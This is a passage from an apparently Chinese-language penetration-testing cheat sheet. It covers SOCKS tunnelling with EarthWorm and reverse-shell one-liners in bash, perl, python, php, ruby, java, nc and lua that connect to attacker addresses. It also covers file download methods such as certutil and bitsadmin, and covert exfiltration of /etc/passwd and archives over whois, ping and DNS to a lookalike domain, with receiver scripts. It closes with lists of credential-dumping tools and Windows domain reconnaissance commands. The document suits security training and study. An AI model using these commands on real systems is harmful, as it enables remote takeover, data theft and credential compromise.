</code></pre><p> &#x53CD;&#x5F39; SOCKS v5 &#x670D;&#x52A1;&#x5668;:
a) &#x5148;&#x5728;&#x4E00;&#x53F0;&#x5177;&#x6709;&#x516C;&#x7F51; ip &#x7684;&#x4E3B;&#x673A;A&#x4E0A;&#x8FD0;&#x884C;&#x4EE5;&#x4E0B;&#x547D;&#x4EE4;&#xFF1A;</p>
<pre class="language-"><code>$ ./ew -s rcsocks -l 1080 -e 8888
</code></pre><p>b) &#x5728;&#x76EE;&#x6807;&#x4E3B;&#x673A;B&#x4E0A;&#x542F;&#x52A8; SOCKS v5 &#x670D;&#x52A1; &#x5E76;&#x53CD;&#x5F39;&#x5230;&#x516C;&#x7F51;&#x4E3B;&#x673A;&#x7684; 8888&#x7AEF;&#x53E3;</p>
<pre class="language-"><code>$ ./ew -s rssocks -d 1.1.1.1 -e 8888
</code></pre><p>&#x591A;&#x7EA7;&#x7EA7;&#x8054;</p>
<pre class="language-"><code>$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
</code></pre><p>lcx_tran &#x7684;&#x7528;&#x6CD5;</p>
<pre class="language-"><code>$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
</code></pre><p>lcx_listen&#x3001;lcx_slave &#x7684;&#x7528;&#x6CD5;</p>
<pre class="language-"><code>$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
</code></pre><p>&#x201C;&#x4E09;&#x7EA7;&#x7EA7;&#x8054;&#x201D;&#x7684;&#x672C;&#x5730;SOCKS&#x6D4B;&#x8BD5;&#x7528;&#x4F8B;&#x4EE5;&#x4F9B;&#x53C2;&#x8003;</p>
<pre class="language-"><code>$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
</code></pre><h3 id="termite"><a name="termite" class="anchor-navigation-ex-anchor" href="#termite"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://rootkiter.com/Termite/" target="_blank">Termite</a></h3>
<p>&#x4F7F;&#x7528;&#x8BF4;&#x660E;:<a href="https://rootkiter.com/Termite/README.txt" target="_blank">https://rootkiter.com/Termite/README.txt</a> </p>
<h3 id="&#x4EE3;&#x7406;&#x811A;&#x672C;"><a name="&#x4EE3;&#x7406;&#x811A;&#x672C;" class="anchor-navigation-ex-anchor" href="#&#x4EE3;&#x7406;&#x811A;&#x672C;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4EE3;&#x7406;&#x811A;&#x672C;</h3>
<p>reGeorg :<a href="https://github.com/sensepost/reGeorg" target="_blank">https://github.com/sensepost/reGeorg</a></p>
<h2 id="shell&#x53CD;&#x5F39;"><a name="shell&#x53CD;&#x5F39;" class="anchor-navigation-ex-anchor" href="#shell&#x53CD;&#x5F39;"><i class="fa fa-link" aria-hidden="true"></i></a>shell&#x53CD;&#x5F39;</h2>
<p>bash  </p>
<pre class="language-"><code>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1
</code></pre><p>perl </p>
<pre class="language-"><code>perl -e &apos;use Socket;$i=&quot;10.0.0.1&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);};&apos;
</code></pre><p>python </p>
<pre class="language-"><code>python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&apos;
</code></pre><p>php（假定 socket 对应的文件描述符是 3；若没有得到 shell，可改试 4 或 5，下面的 lua 版本同理）</p>
<pre class="language-"><code>php -r &apos;$sock=fsockopen(&quot;10.0.0.1&quot;,1234);exec(&quot;/bin/sh -i <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;3</span> <span class="token punctuation">&gt;</span></span>&amp;3 2&gt;&amp;3&quot;);&apos;
</code></pre><p>ruby </p>
<pre class="language-"><code>ruby -rsocket -e&apos;f=TCPSocket.open(&quot;10.0.0.1&quot;,1234).to_i;exec sprintf(&quot;/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)&apos;
</code></pre><p>java </p>
<pre class="language-"><code>r = Runtime.getRuntime()
p = r.exec([&quot;/bin/bash&quot;,&quot;-c&quot;,&quot;exec 5&lt;&gt;/dev/tcp/10.0.0.1/2002;cat <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;5</span> <span class="token attr-name">|</span> <span class="token attr-name">while</span> <span class="token attr-name">read</span> <span class="token attr-name">line;</span> <span class="token attr-name">do</span> <span class="token attr-name">\$line</span> <span class="token attr-name">2</span><span class="token punctuation">&gt;</span></span>&amp;5 &gt;<span class="token entity" title="&amp;5;">&amp;5;</span> done&quot;] as String[])
p.waitFor()
</code></pre><p>nc </p>
<pre class="language-"><code>#&#x4F7F;&#x7528;-e 
nc -e /bin/sh 223.8.200.234 1234
</code></pre><pre class="language-"><code>#&#x4E0D;&#x4F7F;&#x7528;-e
mknod /tmp/backpipe p
/bin/sh 0&lt;/tmp/backpipe | nc attackerip listenport 1&gt;/tmp/backpipe
</code></pre><p>lua </p>
<pre class="language-"><code>lua -e &quot;require(&apos;socket&apos;);require(&apos;os&apos;);t=socket.tcp();t:connect(&apos;202.103.243.122&apos;,&apos;1234&apos;);os.execute(&apos;/bin/sh -i <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;3</span> <span class="token punctuation">&gt;</span></span>&amp;3 2&gt;&amp;3&apos;);&quot;
</code></pre><h2 id="&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;"><a name="&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;</h2>
<p>wput </p>
<pre class="language-"><code>wput dir_name ftp://linuxpig:123456@host.com/
</code></pre><p>wget </p>
<pre class="language-"><code>wget http://site.com/1.rar -O 1.rar
</code></pre><p>aria2c&#xFF08;&#x9700;&#x5B89;&#x88C5;&#xFF09; </p>
<pre class="language-"><code>aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
</code></pre><p>powershell</p>
<pre class="language-"><code>$p = New-Object System.Net.WebClient 
$p.DownloadFile(&quot;http://domain/file&quot;,&quot;$env:USERPROFILE\file&quot;)  # PowerShell does not expand %homepath%; use $env: variables or an absolute path
</code></pre><p>vbs&#x811A;&#x672C; </p>
<pre class="language-"><code>Set args = Wscript.Arguments
Url = &quot;http://domain/file&quot;
dim xHttp: Set xHttp = createobject(&quot;Microsoft.XMLHTTP&quot;)
dim bStrm: Set bStrm = createobject(&quot;Adodb.Stream&quot;)
xHttp.Open &quot;GET&quot;, Url, False
xHttp.Send
with bStrm
.type = 1 &apos;
.open
.write xHttp.responseBody
.savetofile &quot;C:\%homepath%\file&quot;, 2 &apos; VBScript does not expand %homepath%; use WScript.Shell.ExpandEnvironmentStrings or an absolute path
end with
</code></pre><blockquote>
<p>&#x6267;&#x884C; &#xFF1A;cscript test.vbs</p>
</blockquote>
<p>Perl </p>
<pre class="language-"><code>#!/usr/bin/perl 
use LWP::Simple; 
getstore(&quot;http://domain/file&quot;, &quot;file&quot;);
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;perl test.pl</p>
</blockquote>
<p>Python </p>
<pre class="language-"><code>#!/usr/bin/python 
import urllib2 
u = urllib2.urlopen(&apos;http://domain/file&apos;) 
localFile = open(&apos;local_file&apos;, &apos;w&apos;) 
localFile.write(u.read()) 
localFile.close()
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;python test.py</p>
</blockquote>
<p>Ruby </p>
<pre class="language-"><code>#!/usr/bin/ruby
require &apos;net/http&apos;
Net::HTTP.start(&quot;www.domain.com&quot;) { |http|
r = http.get(&quot;/file&quot;)
open(&quot;save_location&quot;, &quot;wb&quot;) { |file|
file.write(r.body)
}
}
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;ruby test.rb</p>
</blockquote>
<p>PHP </p>
<pre class="language-"><code><span class="token prolog">&lt;?php
$url  = &apos;http://www.example.com/file&apos;;
$path = &apos;/path/to/file&apos;;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?&gt;</span>
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;php test.php</p>
</blockquote>
<p>NC 
attacker </p>
<pre class="language-"><code>cat file | nc -l 1234
</code></pre><p>target</p>
<pre class="language-"><code>nc host_ip 1234 &gt; file
</code></pre><p>FTP</p>
<pre class="language-"><code>ftp 127.0.0.1
username
password
get file
exit
</code></pre><p>TFTP </p>
<pre class="language-"><code>rem tftp [-i] host GET source destination  (remote file first, local path second)
tftp -i host GET file_on_tftp_server C:\%homepath%\file
</code></pre><p>Bitsadmin </p>
<pre class="language-"><code>bitsadmin /transfer n http://domain/file c:\%homepath%\file
</code></pre><p>Windows &#x6587;&#x4EF6;&#x5171;&#x4EAB; </p>
<pre class="language-"><code>net use x: \\127.0.0.1\share /user:example.com\userID myPassword
</code></pre><p>SCP 
&#x672C;&#x5730;&#x5230;&#x8FDC;&#x7A0B; </p>
<pre class="language-"><code>scp file user@host.com:/tmp
</code></pre><p>&#x8FDC;&#x7A0B;&#x5230;&#x672C;&#x5730; </p>
<pre class="language-"><code>scp user@host.com:/tmp file
</code></pre><p>rsync 
&#x8FDC;&#x7A0B;rsync&#x670D;&#x52A1;&#x5668;&#x4E2D;&#x62F7;&#x8D1D;&#x6587;&#x4EF6;&#x5230;&#x672C;&#x5730;&#x673A; </p>
<pre class="language-"><code>rsync -av root@192.168.78.192::www /databack
</code></pre><p>&#x672C;&#x5730;&#x673A;&#x5668;&#x62F7;&#x8D1D;&#x6587;&#x4EF6;&#x5230;&#x8FDC;&#x7A0B;rsync&#x670D;&#x52A1;&#x5668; </p>
<pre class="language-"><code>rsync -av /databack root@192.168.78.192::www
</code></pre><p>certutil.exe（下载内容会留在 certutil 的 URL 缓存中形成痕迹，事后可用 certutil -urlcache 查看、certutil -urlcache * delete 清理）</p>
<pre class="language-"><code>certutil.exe -urlcache -split -f http://site.com/file
</code></pre><p>copy</p>
<pre class="language-"><code>copy \\IP\ShareName\file.exe file.exe
</code></pre><p>WHOIS
&#x63A5;&#x6536;&#x7AEF; Host B&#xFF1A;</p>
<pre class="language-"><code>nc -vlnp 1337 | sed &quot;s/ //g&quot; | base64 -d
</code></pre><p>&#x53D1;&#x9001;&#x7AEF; Host A&#xFF1A;</p>
<pre class="language-"><code>whois -h host_ip -p 1337 `cat /etc/passwd | base64`
</code></pre><p><a href="https://twitter.com/mubix/status/1102780436118409216" target="_blank">WHOIS + TAR</a>
First:  </p>
<pre class="language-"><code>ncat -k -l -p 4444 | tee files.b64  #tee to a file so you can make sure you have it
</code></pre><p>Next</p>
<pre class="language-"><code>tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
</code></pre><p>Finally</p>
<pre class="language-"><code>cat files.b64 | tr -d &apos;\r\n&apos; | base64 -d | tar zxv #to get the files out
</code></pre><p>PING
&#x53D1;&#x9001;&#x7AEF;:</p>
<pre class="language-"><code>xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
</code></pre><p>&#x63A5;&#x6536;&#x7AEF;<code>ping_receiver.py</code>:</p>
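<pre class="language-"><code># ICMP receiver for the xxd/ping loop above: every echo request carries a
# 4-byte chunk of the file as its ping pattern, so the last 4 payload bytes
# of each request are the next chunk in order.
import sys

try:
    from scapy.all import *
except ImportError:
    print(&quot;Scapy not found, please install scapy: pip install scapy&quot;)
    sys.exit(1)


def process_packet(pkt):
    # Only echo requests (type 8) carry sender data; an echo reply would
    # mirror the payload and print every chunk twice. Packets without a
    # Raw payload are skipped instead of raising AttributeError.
    if not pkt.haslayer(ICMP) or pkt[ICMP].type != 8 or not pkt.haslayer(Raw):
        return
    data = pkt[Raw].load[-4:]
    # Write raw bytes instead of decoding each chunk: a multi-byte UTF-8
    # sequence can be split across two 4-byte chunks and would not decode
    # on its own.
    # NOTE(review): if the file length is not a multiple of 4 the final
    # pattern is shorter and repeats inside the payload, so the last chunk
    # may come out duplicated -- pad the input on the sending side if that
    # matters.
    sys.stdout.buffer.write(data)
    sys.stdout.buffer.flush()


# Interface is hard-coded; change it to the one the pings arrive on.
sniff(iface=&quot;eth0&quot;, prn=process_packet)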
</code></pre><pre class="language-"><code>python3 ping_receiver.py
</code></pre><p>DIG
&#x53D1;&#x9001;&#x7AEF;:</p>
<pre class="language-"><code>xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
</code></pre><p>&#x63A5;&#x6536;&#x7AEF;<code>dns_reciver.py</code>:</p>
<pre class="language-"><code>try:
    from scapy.all import *
except:
    print(&quot;Scapy not found, please install scapy: pip install scapy&quot;)

# Per-packet callback handed to sniff() below.
# Only DNS packets are looked at: the queried name is taken from the
# question section, and if its second label starts with gooogle (the
# lookalike zone the sender appends on the dig command line), everything
# before the trailing 13 characters (.gooogle.com.) is hex-decoded and
# printed with no newline so consecutive chunks join.
# Defender note: the artefact is a burst of queries whose first label is a
# long hex string (31 bytes per chunk on the sending side) under a
# lookalike domain; DNS query logs or a resolver capture can be checked
# for that pattern.
def process_packet(pkt):
    if pkt.haslayer(DNS):
        domain = pkt[DNS][DNSQR].qname.decode(&apos;utf-8&apos;)
        root_domain = domain.split(&apos;.&apos;)[1]
        if root_domain.startswith(&apos;gooogle&apos;):
            # domain[:-13] drops the .gooogle.com. suffix, leaving the hex chunk.
            print(f&apos;{bytearray.fromhex(domain[:-13]).decode(&quot;utf-8&quot;)}&apos;, flush=True, end=&apos;&apos;)

# Captures on eth0 and hands every packet to process_packet.
sniff(iface=&quot;eth0&quot;, prn=process_packet)
</code></pre><pre class="language-"><code>python3 dns_reciver.py
</code></pre><p>... </p>
<h2 id="&#x642D;&#x5EFA;-http-server"><a name="&#x642D;&#x5EFA;-http-server" class="anchor-navigation-ex-anchor" href="#&#x642D;&#x5EFA;-http-server"><i class="fa fa-link" aria-hidden="true"></i></a>&#x642D;&#x5EFA; HTTP server</h2>
<p>python2</p>
<pre class="language-"><code>python -m SimpleHTTPServer 1337
</code></pre><p>python3</p>
<pre class="language-"><code>python -m http.server 1337
</code></pre><p>PHP 5.4+</p>
<pre class="language-"><code>php -S 0.0.0.0:1337
</code></pre><p>ruby</p>
<pre class="language-"><code>ruby -rwebrick -e&apos;WEBrick::HTTPServer.new(:Port =&gt; 1337, :DocumentRoot =&gt; Dir.pwd).start&apos;
</code></pre><pre class="language-"><code>ruby -run -e httpd . -p 1337
</code></pre><p>Perl</p>
<pre class="language-"><code>perl -MHTTP::Server::Brick -e &apos;$s=HTTP::Server::Brick-&gt;new(port=&gt;1337); $s-&gt;mount(&quot;/&quot;=&gt;{path=&gt;&quot;.&quot;}); $s-&gt;start&apos;
</code></pre><pre class="language-"><code>perl -MIO::All -e &apos;io(&quot;:8080&quot;)-&gt;fork-&gt;accept-&gt;(sub { $_[0] &lt; io(-x $1 +? &quot;./$1 |&quot; : $1) if /^GET \/(.*) / })&apos;
</code></pre><p>busybox httpd</p>
<pre class="language-"><code>busybox httpd -f -p 8000
</code></pre><h1 id="&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><a name="&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;</h1>
<h2 id="&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><a name="&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;</h2>
<h3 id="1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;"><a name="1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;</h3>
<p>windows&#x7528;&#x6237;&#x5217;&#x8868; 
&#x5206;&#x6790;&#x90AE;&#x4EF6;&#x7528;&#x6237;&#xFF0C;&#x5185;&#x7F51;[&#x57DF;]&#x90AE;&#x4EF6;&#x7528;&#x6237;&#xFF0C;&#x901A;&#x5E38;&#x5C31;&#x662F;&#x5185;&#x7F51;[&#x57DF;]&#x7528;&#x6237; </p>
<h3 id="2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;"><a name="2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;</h3>
<p>&#x5206;&#x6790;&#x6740;&#x6BD2;&#x8F6F;&#x4EF6;/&#x5B89;&#x5168;&#x76D1;&#x63A7;&#x5DE5;&#x5177;&#x7B49; 
&#x90AE;&#x4EF6;&#x5BA2;&#x6237;&#x7AEF; 
VPN 
ftp&#x7B49;  </p>
<h3 id="3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;"><a name="3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;</h3>
<p>&#x4E0E;&#x5B89;&#x5168;&#x9632;&#x8303;&#x5DE5;&#x5177;&#x6709;&#x5173;&#x670D;&#x52A1;[&#x5224;&#x65AD;&#x662F;&#x5426;&#x53EF;&#x4EE5;&#x624B;&#x52A8;&#x5F00;&#x5173;&#x7B49;]
&#x5B58;&#x5728;&#x95EE;&#x9898;&#x7684;&#x670D;&#x52A1;[&#x6743;&#x9650;/&#x6F0F;&#x6D1E;]</p>
<h3 id="4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;"><a name="4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;</h3>
<p>&#x5F00;&#x653E;&#x7AEF;&#x53E3;&#x5BF9;&#x5E94;&#x7684;&#x5E38;&#x89C1;&#x670D;&#x52A1;/&#x5E94;&#x7528;&#x7A0B;&#x5E8F;[&#x533F;&#x540D;/&#x6743;&#x9650;/&#x6F0F;&#x6D1E;&#x7B49;]
&#x5229;&#x7528;&#x7AEF;&#x53E3;&#x8FDB;&#x884C;&#x4FE1;&#x606F;&#x6536;&#x96C6;</p>
<h3 id="5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;"><a name="5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;</h3>
<p>&#x5206;&#x6790; Windows &#x8865;&#x4E01;
&#x7B2C;&#x4E09;&#x65B9;&#x8F6F;&#x4EF6;[Java/Oracle/Flash &#x7B49;]&#x6F0F;&#x6D1E;</p>
<h3 id="6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;"><a name="6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;" class="anchor-navigation-ex-anchor" href="#6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;"><i class="fa fa-link" aria-hidden="true"></i></a>6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;</h3>
<p>&#x672C;&#x673A;&#x5171;&#x4EAB;&#x5217;&#x8868;/&#x8BBF;&#x95EE;&#x6743;&#x9650;
&#x672C;&#x673A;&#x8BBF;&#x95EE;&#x7684;&#x57DF;&#x5171;&#x4EAB;/&#x8BBF;&#x95EE;&#x6743;&#x9650;</p>
<h3 id="7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;"><a name="7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;" class="anchor-navigation-ex-anchor" href="#7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;"><i class="fa fa-link" aria-hidden="true"></i></a>7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;</h3>
<p>&#x5386;&#x53F2;&#x8BB0;&#x5F55; 
&#x6536;&#x85CF;&#x5939; 
&#x6587;&#x6863;&#x7B49; </p>
<h3 id="8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;"><a name="8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;</h3>
<h4 id="windows"><a name="windows" class="anchor-navigation-ex-anchor" href="#windows"><i class="fa fa-link" aria-hidden="true"></i></a>Windows</h4>
<ul>
<li><a href="https://github.com/gentilkiwi/mimikatz" target="_blank">mimikatz</a>  </li>
<li><a href="https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64" target="_blank">wce</a>  </li>
<li><a href="https://github.com/peewpw/Invoke-WCMDump" target="_blank">Invoke-WCMDump  </a></li>
<li><a href="https://github.com/giMini/mimiDbg" target="_blank">mimiDbg  </a></li>
<li><a href="https://github.com/AlessandroZ/LaZagne" target="_blank">LaZagne</a></li>
<li><a href="http://launcher.nirsoft.net/downloads/" target="_blank">nirsoft_package</a></li>
<li><a href="https://github.com/quarkslab/quarkspwdump" target="_blank">QuarksPwDump</a> <a href="https://github.com/mcandre/fgdump" target="_blank">fgdump</a></li>
<li>&#x661F;&#x53F7;&#x67E5;&#x770B;&#x5668;&#x7B49;</li>
</ul>
<h4 id="linux"><a name="linux" class="anchor-navigation-ex-anchor" href="#linux"><i class="fa fa-link" aria-hidden="true"></i></a>Linux</h4>
<ul>
<li><a href="https://github.com/AlessandroZ/LaZagne" target="_blank">LaZagne</a>  </li>
<li><a href="https://github.com/huntergregal/mimipenguin" target="_blank">mimipenguin</a></li>
</ul>
<h2 id="&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><a name="&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;</h2>
<h3 id="&#x7AEF;&#x53E3;&#x626B;&#x63CF;"><a name="&#x7AEF;&#x53E3;&#x626B;&#x63CF;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x626B;&#x63CF;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x626B;&#x63CF;</h3>
<h4 id="&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;"><a name="&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;</h4>
<ul>
<li><a href="https://nmap.org/" target="_blank">nmap</a> </li>
<li><a href="https://github.com/robertdavidgraham/masscan" target="_blank">masscan</a> </li>
<li><a href="https://github.com/zmap/zmap" target="_blank">zmap</a></li>
<li>s&#x626B;&#x63CF;&#x5668; </li>
<li>&#x81EA;&#x5199;&#x811A;&#x672C;&#x7B49; </li>
<li>NC </li>
<li>...</li>
</ul>
<h3 id="&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;"><a name="&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;</h3>
<ul>
<li>DMZ</li>
<li>&#x7BA1;&#x7406;&#x7F51;</li>
<li>&#x751F;&#x4EA7;&#x7F51;</li>
<li>&#x6D4B;&#x8BD5;&#x7F51;</li>
</ul>
<h3 id="&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;"><a name="&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;</h3>
<p>ipconfig:</p>
<pre class="language-"><code>ipconfig /all ------&gt; &#x67E5;&#x8BE2;&#x672C;&#x673A; IP &#x6BB5;&#xFF0C;&#x6240;&#x5728;&#x57DF;&#x7B49;
</code></pre><p>net:</p>
<pre class="language-"><code>net user ------&gt; &#x672C;&#x673A;&#x7528;&#x6237;&#x5217;&#x8868;
net localgroup administrators ------&gt; &#x672C;&#x673A;&#x7BA1;&#x7406;&#x5458;[&#x901A;&#x5E38;&#x542B;&#x6709;&#x57DF;&#x7528;&#x6237;]
net user /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x7528;&#x6237;
net group /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x91CC;&#x9762;&#x7684;&#x5DE5;&#x4F5C;&#x7EC4;
net group &quot;domain admins&quot; /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x7BA1;&#x7406;&#x5458;&#x7528;&#x6237;&#x7EC4;
net localgroup administrators /domain ------&gt; &#x767B;&#x5F55;&#x672C;&#x673A;&#x7684;&#x57DF;&#x7BA1;&#x7406;&#x5458;
net localgroup administrators workgroup\user001 /add -----&gt;&#x57DF;&#x7528;&#x6237;&#x6DFB;&#x52A0;&#x5230;&#x672C;&#x673A; net group &quot;Domain controllers&quot; -------&gt; &#x67E5;&#x770B;&#x57DF;&#x63A7;&#x5236;&#x5668;(&#x5982;&#x679C;&#x6709;&#x591A;&#x53F0;)
net view ------&gt; &#x67E5;&#x8BE2;&#x540C;&#x4E00;&#x57DF;&#x5185;&#x673A;&#x5668;&#x5217;&#x8868; net view /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x5217;&#x8868;
net view /domain:domainname
</code></pre><p>dsquery </p>
<pre class="language-"><code>dsquery computer domainroot -limit 65535 &amp;&amp; net group &quot;domain
computers&quot; /domain ------&gt; &#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x6240;&#x6709;&#x673A;&#x5668;&#x540D;
